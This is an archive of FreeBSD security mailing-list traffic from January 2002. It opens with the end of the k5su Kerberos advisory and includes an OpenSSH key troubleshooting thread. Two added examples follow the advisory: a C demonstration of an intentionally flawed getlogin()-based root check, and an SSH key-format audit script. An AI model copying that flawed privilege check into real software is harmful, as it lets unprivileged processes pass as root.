# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-02:07/k5su.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-02:07/k5su.patch.asc

Execute the following commands as root:

# cd /usr/src
# patch < /path/to/k5su.patch
# cd /usr/src/kerberos5/lib
# env MAKE_KERBEROS5=yes make depend
# env MAKE_KERBEROS5=yes make all install
# cd /usr/src/kerberos5/usr.bin/k5su
# env MAKE_KERBEROS5=yes make depend
# env MAKE_KERBEROS5=yes make all install

[Heimdal port]

Do one of the following:

1) Upgrade your entire ports collection and rebuild the port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from the following directories:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/heimdal-0.4e_2.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/heimdal-0.4e_2.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

3) Download a new port skeleton for the heimdal port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above.  The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in the FreeBSD ports collection.

[Kerberos 5 in the base system]

Path                                                             Revision
  Branch
-------------------------------------------------------------------------
src/crypto/heimdal/appl/su/su.c
  HEAD                                                            1.1.1.4
  RELENG_4                                                    1.1.1.1.2.2
  RELENG_4_4                                              1.1.1.1.2.1.4.1
  RELENG_4_3                                              1.1.1.1.2.1.2.1
-------------------------------------------------------------------------

[Heimdal port]

Path                                                             Revision
-------------------------------------------------------------------------
ports/security/heimdal/Makefile                                      1.46
ports/security/heimdal/patch-appl::su::su.c                           1.1
-------------------------------------------------------------------------
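
The flaw from section II in miniature, as an added example that is not part of the advisory and is not the FreeBSD patch: the name returned by getlogin() belongs to the login session and stays the same when a process gives up its user ID, so only a check on the process credential reflects what the caller is allowed to do. The struct, the function names and the scenario table are constructed for illustration, and using the real UID from getuid() as the credential check is an assumption, since the page does not show the fix.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* The two identities the advisory distinguishes (hypothetical struct). */
struct caller_identity {
    const char *login_name; /* session login name, as getlogin() reports it */
    uid_t       real_uid;   /* real user ID of the process, as getuid() reports it */
};

/* Flawed pattern described in the advisory: treat the caller as root
 * because the session's login name says "root". */
bool caller_is_root_by_login(const struct caller_identity *id)
{
    return id->login_name != NULL && strcmp(id->login_name, "root") == 0;
}

/* Credential-based check (assumed alternative): only the real UID of
 * the calling process decides. */
bool caller_is_root_by_uid(const struct caller_identity *id)
{
    return id->real_uid == 0;
}

/* Constructed scenarios; none of these values come from the advisory. */
struct scenario {
    const char *description;
    struct caller_identity id;
};

static const struct scenario scenarios[] = {
    { "root logged in on a terminal",                    { "root",  0    } },
    { "started by root, then dropped to uid 1001",       { "root",  1001 } },
    { "ordinary user session",                           { "alice", 1001 } },
    { "root process in a session with no login name",    { NULL,    0    } },
};

#define N_SCENARIOS (sizeof scenarios / sizeof scenarios[0])

/* Counts scenarios in which the login-name check would treat a
 * non-root process as root: the condition the advisory warns about. */
size_t count_false_grants(void)
{
    size_t n = 0;
    for (size_t i = 0; i < N_SCENARIOS; i++) {
        if (caller_is_root_by_login(&scenarios[i].id) &&
            !caller_is_root_by_uid(&scenarios[i].id))
            n++;
    }
    return n;
}

/* Reads both identities for the running process. getlogin() may return
 * NULL when the session has no login name. */
struct caller_identity current_identity(void)
{
    struct caller_identity id;
    id.login_name = getlogin();
    id.real_uid = getuid();
    return id;
}

static void report(const char *label, const struct caller_identity *id)
{
    printf("%-48s login=%-6s uid=%-5lu by_login=%d by_uid=%d\n",
           label,
           id->login_name ? id->login_name : "(none)",
           (unsigned long)id->real_uid,
           caller_is_root_by_login(id),
           caller_is_root_by_uid(id));
}

int main(void)
{
    for (size_t i = 0; i < N_SCENARIOS; i++)
        report(scenarios[i].description, &scenarios[i].id);

    struct caller_identity me = current_identity();
    report("this process", &me);

    printf("scenarios where the login-name check wrongly grants root: %lu\n",
           (unsigned long)count_false_grants());
    return 0;
}
```
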
mcqueen.wolfsburg.de (8.11.3/8.11.3/tw-20010821) with ESMTP id g0IF34a29290 for ; Fri, 18 Jan 2002 16:03:05 +0100 Received: from tisys.org (jodie.ncptiddische.net [192.168.0.2]) by colt.ncptiddische.net (8.11.6/8.11.6) with ESMTP id g0IF4gX01806 for ; Fri, 18 Jan 2002 16:04:43 +0100 (CET) (envelope-from nils@tisys.org) Received: (from nils@localhost) by tisys.org (8.11.6/8.11.6) id g0IF3aL97861 for freebsd-security@FreeBSD.ORG; Fri, 18 Jan 2002 16:03:36 +0100 (CET) (envelope-from nils) Date: Fri, 18 Jan 2002 16:03:36 +0100 From: Nils Holland To: FreeBSD Security Advisories Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Message-ID: <20020118160336.A97707@tisys.org> Mail-Followup-To: FreeBSD Security Advisories References: <200201181356.g0IDuh995329@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200201181356.g0IDuh995329@freefall.freebsd.org>; from security-advisories@FreeBSD.ORG on Fri, Jan 18, 2002 at 05:56:43AM -0800 X-Operating-System: FreeBSD jodie.ncptiddische.net 4.5-RC FreeBSD 4.5-RC X-Machine-Uptime: 4:00PM up 1:46, 1 user, load averages: 0.44, 0.66, 0.45 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jan 18, 2002 at 05:56:43AM -0800, FreeBSD Security Advisories stood up and spoke: > Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) > 2002-01-17 15:45:05 UTC (RELENG_4_4) > 2002-10-31 19:58:05 UTC (heimdal port) Seems that we're gonna have to wait a *LONG* time before it gets corrected in the ports collection, according to this advisory ;-) Greetings Nils -- Nils Holland Ti Systems - FreeBSD in Tiddische, Germany http://www.tisys.org * nils@tisys.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 7:33: 
8 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4C79837B404 for ; Fri, 18 Jan 2002 07:33:04 -0800 (PST) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BA29A2D; Fri, 18 Jan 2002 09:33:03 -0600 (CST) Received: (from nectar@localhost) by madman.nectar.cc (8.11.6/8.11.6) id g0IFX2p42060; Fri, 18 Jan 2002 09:33:02 -0600 (CST) (envelope-from nectar) Date: Fri, 18 Jan 2002 09:33:02 -0600 From: "Jacques A. Vidrine" To: Nils Holland Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Message-ID: <20020118153302.GA42023@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Nils Holland , freebsd-security@FreeBSD.ORG References: <200201181356.g0IDuh995329@freefall.freebsd.org> <20020118160336.A97707@tisys.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020118160336.A97707@tisys.org> User-Agent: Mutt/1.3.25i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jan 18, 2002 at 04:03:36PM +0100, Nils Holland wrote: > On Fri, Jan 18, 2002 at 05:56:43AM -0800, FreeBSD Security Advisories stood up and spoke: > > > Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) > > 2002-01-17 15:45:05 UTC (RELENG_4_4) > > 2002-10-31 19:58:05 UTC (heimdal port) > > Seems that we're gonna have to wait a *LONG* time before it gets corrected > in the ports collection, according to this advisory ;-) Gah! Thanks for catching that ;-) It will be corrected in a later revision. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 7:34:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 0E41B37B402 for ; Fri, 18 Jan 2002 07:34:34 -0800 (PST) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 8B29C4C; Fri, 18 Jan 2002 09:34:34 -0600 (CST) Received: (from nectar@localhost) by madman.nectar.cc (8.11.6/8.11.6) id g0IFYYS42067; Fri, 18 Jan 2002 09:34:34 -0600 (CST) (envelope-from nectar) Date: Fri, 18 Jan 2002 09:34:34 -0600 From: "Jacques A. Vidrine" To: Nils Holland Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su Message-ID: <20020118153434.GB42023@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Nils Holland , freebsd-security@FreeBSD.ORG References: <200201181356.g0IDuh995329@freefall.freebsd.org> <20020118160336.A97707@tisys.org> <20020118153302.GA42023@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020118153302.GA42023@madman.nectar.cc> User-Agent: Mutt/1.3.25i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jan 18, 2002 at 09:33:02AM -0600, Jacques A. 
Vidrine wrote: > On Fri, Jan 18, 2002 at 04:03:36PM +0100, Nils Holland wrote: > > On Fri, Jan 18, 2002 at 05:56:43AM -0800, FreeBSD Security Advisories stood up and spoke: > > > > > Corrected: 2002-01-15 21:52:48 UTC (RELENG_4) > > > 2002-01-17 15:45:05 UTC (RELENG_4_4) > > > 2002-10-31 19:58:05 UTC (heimdal port) > > > > Seems that we're gonna have to wait a *LONG* time before it gets corrected > > in the ports collection, according to this advisory ;-) > > Gah! Thanks for catching that ;-) It will be corrected in a later > revision. And just to be clear, it is the year that needs correcting ... the port is good to go. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 11:23:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail01.edsamail.com.ph (mail01.edsamail.com.ph [210.16.71.2]) by hub.freebsd.org (Postfix) with SMTP id 0D1B837B404 for ; Fri, 18 Jan 2002 11:23:24 -0800 (PST) Received: (qmail 2749 invoked from network); 18 Jan 2002 19:23:22 -0000 Received: from unknown (HELO edsamail.com.ph) (10.2.0.251) by 10.2.0.251 with SMTP; 18 Jan 2002 19:23:22 -0000 X-Mailer: Edsamail 1.31 (Build 1129) Date: Sat, 19 Jan 2002 03:28:30 +0800 From: "mhike ." 
To: freebsd-security@freebsd.org Subject: subscribe Content-Type: text/plain Message-Id: <20020118192325.0D1B837B404@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org __________________________________ www.edsamail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 15:21:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47]) by hub.freebsd.org (Postfix) with ESMTP id 3C74337B419 for ; Fri, 18 Jan 2002 15:21:49 -0800 (PST) Received: from neildesk.neilmcgann.co.uk ([213.107.105.120]) by mta07-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020118232148.OONB6966.mta07-svc.ntlworld.com@neildesk.neilmcgann.co.uk> for ; Fri, 18 Jan 2002 23:21:48 +0000 Message-Id: <5.1.0.14.0.20020118231321.00a43230@pop.ntlworld.com> X-Sender: neil.mcgann@pop.ntlworld.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 18 Jan 2002 23:22:38 +0000 To: freebsd-security@FreeBSD.ORG From: Neil McGann Subject: openssh problem Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi All, I have a problem with 4.5-RC and openssh 3.0.2 accepting public keys. Normal password authentication via ssh works OK and I have tested the keys on another server running 4.3 (free logon account with to m-net.arbornet.org) with my client (putty V0.45beta) so I know they are valid. 
When I attempt to logon to my machine I get a message saying 'server refused our key' and when I turn debug messages on in sshd_conf I see PAM failing to authorise type 'publickey'. I get the same message if I have no keys in the authorized_keys file or if the file isn't there at all. Any suggestions or pointers on how to debug this problem? Neil To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 15:40: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.6]) by hub.freebsd.org (Postfix) with ESMTP id 700F337B419 for ; Fri, 18 Jan 2002 15:40:02 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (8.11.6/8.11.6) with ESMTP id g0INdx418223; Fri, 18 Jan 2002 18:39:59 -0500 (EST) Date: Fri, 18 Jan 2002 18:39:59 -0500 (EST) From: Trevor Johnson To: Neil McGann Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh problem In-Reply-To: <5.1.0.14.0.20020118231321.00a43230@pop.ntlworld.com> Message-ID: <20020118182945.B11968-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Hi All, Hi, Neil. > I have a problem with 4.5-RC and openssh 3.0.2 accepting public keys. > Normal password authentication via ssh works OK and I have tested the keys > on another server running 4.3 (free logon account with to > m-net.arbornet.org) with my client (putty V0.45beta) so I know they are valid. > > When I attempt to logon to my machine I get a message saying 'server > refused our key' and when I turn debug messages on in sshd_conf I see PAM > failing to authorise type 'publickey'. I get the same message if I have no > keys in the authorized_keys file or if the file isn't there at all. 
Possibly you are connecting with protocol version 2, but you generated a public key for protocol version 1 (or vice versa). Check the FILES section of the ssh-keygen man page (paragraphs about $HOME/.ssh/identity.pub and $HOME/.ssh/id_dsa.pub). Try making a DSA key and putting it in ~/.ssh/authorized_keys2. Protocol version 1 is less secure.

If that isn't the problem, try the -v option to the ssh client.
--
Trevor Johnson

From owner-freebsd-security Fri Jan 18 15:45:43 2002
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.vsat.net (ns1.vsat.net [24.142.102.10])
    by hub.freebsd.org (Postfix) with ESMTP id 42D9A37B416
    for ; Fri, 18 Jan 2002 15:45:41 -0800 (PST)
Received: from localhost (jhart@localhost)
    by ns1.vsat.net (8.9.3/8.9.3) with SMTP id PAA70887
    for ; Fri, 18 Jan 2002 15:57:37 -0800 (PST)
    (envelope-from jhart@ns1.vsat.net)
Date: Fri, 18 Jan 2002 15:57:37 -0800 (PST)
From: Jonathan Hart
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

unsubscribe freebsd-security
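
Trevor Johnson's reply in the "openssh problem" thread above points at a protocol-version mismatch between the key and the connection; the two one-line public key formats differ enough to check mechanically. The script below is an added example, not part of any list message: the function names and the truncated sample key lines are constructed, it assumes entries carry no leading options field, and which file is read for which protocol is passed in as an argument (the reply suggests authorized_keys2 for protocol 2).

```shell
#!/bin/sh
# Added example (not from the thread): flag public-key lines whose format does
# not match the SSH protocol version a key file is meant to hold.

# key_protocol LINE -> prints 1, 2, skip or unknown
#   1: protocol-1 RSA line, "bits exponent modulus [comment]"
#   2: protocol-2 line, "ssh-dss|ssh-rsa base64-blob [comment]"
# Assumption: no options field (from=, command=, ...) precedes the key.
key_protocol() {
    printf '%s\n' "$1" | awk '
        NF == 0 || $1 ~ /^#/ { print "skip"; exit }
        ($1 == "ssh-dss" || $1 == "ssh-rsa") && $2 ~ "^[A-Za-z0-9+/]+=*$" {
            print 2; exit }
        $1 ~ /^[0-9]+$/ && $2 ~ /^[0-9]+$/ && $3 ~ /^[0-9]+$/ { print 1; exit }
        { print "unknown" }'
}

# audit_keyfile EXPECTED FILE -> one line per mismatching entry;
# exit status 0 when every key line has the EXPECTED protocol format.
audit_keyfile() {
    expected=$1 file=$2 n=0 bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        proto=$(key_protocol "$line")
        case $proto in
            skip|"$expected") ;;
            *) echo "$file:$n: key format is '$proto', file expects '$expected'"
               bad=$((bad + 1)) ;;
        esac
    done < "$file"
    [ "$bad" -eq 0 ]
}

# Demo on constructed, truncated key lines (not usable keys): a protocol-2
# DSA line sitting in a file that is being read for protocol-1 keys.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '# constructed sample' \
        '1024 35 1409076329 neil@example' \
        'ssh-dss AAAAB3NzaC1kc3MAAACB neil@example' > "$d/authorized_keys"
    audit_keyfile 1 "$d/authorized_keys"; rc=$?
    rm -rf "$d"
    return "$rc"
}
demo || echo "mismatch found: move the entry or regenerate the key"
```

A line reported as 'unknown' is neither one-line format, for example a multi-line key block pasted from another client, and will not be matched as a key under either protocol.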




From owner-freebsd-security Sat Jan 19 12:28: 1 2002
Delivered-To: freebsd-security@freebsd.org
Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139])
    by hub.freebsd.org (Postfix) with ESMTP id 4FB1137B404
    for ; Sat, 19 Jan 2002 12:27:57 -0800 (PST)
Received: from copernicus-it.nl (dragoneer.xs4all.nl [213.84.71.203])
    by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with ESMTP id g0JKRt0R026367;
    Sat, 19 Jan 2002 21:27:55 +0100 (CET)
Message-ID: <3C49D684.6080800@copernicus-it.nl>
Date: Sat, 19 Jan 2002 21:26:44 +0100
From: "Bob Lefevere (Copernicus)"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1
X-Accept-Language: en-gb
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: unsubscribe
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org